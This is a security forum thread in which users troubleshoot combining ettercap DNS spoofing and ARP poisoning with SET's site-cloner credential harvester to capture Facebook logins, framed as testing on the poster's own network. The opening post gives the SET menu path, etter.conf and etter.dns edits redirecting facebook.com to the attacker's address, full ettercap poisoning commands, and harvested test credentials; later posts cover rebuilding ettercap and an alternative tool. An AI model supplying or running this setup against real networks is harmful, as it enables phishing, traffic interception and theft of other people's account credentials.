Results 1 to 4 of 4

Thread: Ettercap won't redirect DNS spoofing

Hybrid View

  1. #1
    Just burned their ISO
    Join Date
    Nov 2012
    Posts
    2

    Default Ettercap won't redirect DNS spoofing

    Distro: BT5 R3 , VM: VMware

    Hey guys. I've been testing Ettercap/SET on my own personal network and I've ran into a problem: Ettercap doesn't seem to want to redirect the DNS spoof.

    SET seems to be working great:
    Code:
    Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method > Site Cloner
    Then I get prompted with:
    IP address for the POST back in Harvester/Tabnabbing
    So I enter wlan0's IP address (192.168.1.4)

    If I go on another computer on the network and navigate to http://192.168.1.4 it works great. It looks just like Facebook and it even displays the POST results:

    Code:
    [*] WE GOT A HIT! Printing the output:
    POSSIBLE USERNAME FIELD FOUND: email=test
    POSSIBLE PASSWORD FIELD FOUND: pass=test
    The issue I'm having is with ettercap. I'll walk you through the steps I did:
    gedit /etc/etter.conf

    Then I verified that I changed ec_uid and ec_gid's values to 0 as well as removing the # before the re_dir lines under ip_tables:

    Code:
    [privs]
    ec_uid = 0                # nobody is the default
    ec_gid = 0                # nobody is the default
    
    # if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    I went ahead and did the same thing for /usr/local/etc/etter.conf

    Next I cleared out the etter.dns file and put the following (/usr/local/share/ettercap/etter.dns):

    HTML Code:
    facebook.com A 192.168.1.4
    *.facebook.com A 192.168.1.4
    www.facebook.com PTR 192.168.1.4
    Finally I started ettercap
    ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

    Whenever I try to navigate to facebook.com on a Client in my network, it actually directs to Facebooks page (https://www.facebook.com) as opposed to my SET clone (192.168.1.4). I tried changing it from facebook to other sites as well and nothing seems to get ettercap to redirect traffic. Again though, if I navigate to 192.168.1.4 on a machine on the network, it WILL go to the SET clone page and work correctly.

    I wanted to verify that I wasn't making any simple mistakes again, so I double checked to make sure I was on the subnet (even though I knew I already was);

    arp-scan -interface wlan0 --localnet
    Code:
    Interface: wlan0, datalink type: EN10MB (Ethernet)
    Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
    192.168.1.1    00    (Unknown)
    192.168.1.3      (Unknown)
    192.168.1.5  (Unknown)
    192.168.1.15    (Unknown)
    192.168.1.13    (Unknown)
    192.168.1.5      (Unknown) (DUP: 2)
    192.168.1.3    4    (Unknown) (DUP: 2)
    192.168.1.15    (Unknown) (DUP: 2)
    192.168.1.13    (Unknown) (DUP: 2)
    I verified that all of the etter.conf and the etter.dns files were correct and reflect what I posted. I even tried manually adding the gateway IP instead of just using // // , as well as using the autoadd as opposed to dns_spoof

    ettercap -Tqi wlan0 -M arp:remote // /192.168.1.1/ -P autoadd
    Code:
    ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
    
    Listening on wlan0... (Ethernet)
    
    wlan0 ->    XX:XX:XX:XX:XX:XX  192.168.1.4  255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      40 protocol dissectors
      55 ports monitored
    7587 mac vendor fingerprint
    1766 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==>| 100.00 %
    
    3 hosts added to the hosts list...
    
    ARP poisoning victims:
    
    GROUP 1 : ANY (all the hosts in the list)
    
    GROUP 2 : 192.168.1.1 XX:XX:XX:XX:XX:XX
    Starting Unified sniffing...
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    Activating autoadd plugin...
    Just like before, it's producing the same result. It's not performing an actual DNS spoof to any client on the network, however, if a client was to navigate to https://192.168.1.4 ("attacker") it works correctly. Any other ideas by chance? I've been trying to research this and doing different methods but I keep running into the same issue. Thanks guys, I really appreciate your time!

  2. #2
    Just burned their ISO
    Join Date
    Nov 2012
    Posts
    2

    Default Re: Ettercap won't redirect DNS spoofing

    Hey guys! I'm still a little new to Linux. I've been trying to find a way to update Ettercap because I've had a issue with DNS spoofing not working correctly. I was suggested by another member to try this solution:

    Code:
    1) First get the ettercap from here.
    http://ettercap.sourceforge.net/downloads.html
    
    2) Untar it.
    tar -xzf ettercap-0.7.4.tar.gz
    
    3) Get the libnet from here.
    http://linux.softpedia.com/progDownload/...10275.html
    
    4) Untar libnet.
    tar -xzf libnet-1.1.2.1.tar.gz
    
    5) Cd to the extracted directory.
    cd libnet
    ./configure
    make
    make install
    
    libnet will be installed.
    
    6) Now lets install the dependencies for ettercap.
    apt-get install libgtk2.0-dev libpango1.0-dev
    
    7) After that cd to the ettercap directory.
    cd ettercap
    ./configure
    make
    make install
    
    If step #7 completed without any problems/errors then you are good to go.
    
    A restart is recommended
    The issue lies at step 6:

    apt-get install libgtk2.0-dev libpango1.0-dev
    Code:
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Some packages could not be installed. This may mean that you have
    requested an impossible situation or if you are using the unstable
    distribution that some required packages have not yet been created
    or been moved out of Incoming.
    The following information may help to resolve the situation:
    
    The following packages have unmet dependencies:
      libgtk2.0-dev: Depends: libgtk2.0-0 (= 2.20.1-0ubuntu2) but 2.20.1-0ubuntu2.1 is to be installed
                     Depends: libxi-dev (>= 1:1.0.1-4) but it is not going to be installed
    E: Broken packages
    Even if I try to skip that step, after doing the ./configure and I get to the "make" step once in the ettercap folder I'm prompted with
    root@bt:~/ettercap# make
    Code:
    make: *** No targets specified and no makefile found.  Stop.
    I would appreciate any advice. If I need to provide any information I'll be sure to post it here. Thank you very much for your help in advance!
    Last edited by Quieterror; 11-06-2012 at 09:03 AM. Reason: Mistype

  3. #3
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Ettercap won't redirect DNS spoofing

    hi Quieterror
    I DO NOT have the right answer!
    also I'm no expert .... but if you want to try another good alternative ..
    arping with Ettercap with & spoofing with Dnsspoof.
    bye

  4. #4
    Just burned their ISO
    Join Date
    Nov 2012
    Posts
    1

    Default Re: Ettercap won't redirect DNS spoofing

    Hi Guys!!

    I tried the dns spoofing using social engineering attack -credential harvest -web attack -site cloner.. I tried the attack with facebook and i got my test facebook username and pw and it worked.. but when i try it again for the second time and when i type facebook in browser, it is not loading the page but it said facebook spoofed to (my ip) but no result and net connectivity disconnects after few seconds any suggestions..

Similar Threads

  1. Ettercap Redirect problem
    By Loki1986 in forum BackTrack 5 General Topics
    Replies: 0
    Last Post: 11-08-2011, 08:41 AM
  2. DNS Spoofing+SET can't redirect to real page
    By snybit in forum BackTrack 5 General Topics
    Replies: 0
    Last Post: 10-06-2011, 09:50 AM
  3. DNS Redirect with Ettercap
    By Nazagul in forum OLD BackTrack 4 General Support
    Replies: 7
    Last Post: 11-10-2009, 08:35 PM
  4. Ettercap DNS Spoofing Not.. Spoofing
    By oxide in forum OLD Newbie Area
    Replies: 4
    Last Post: 04-02-2009, 10:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •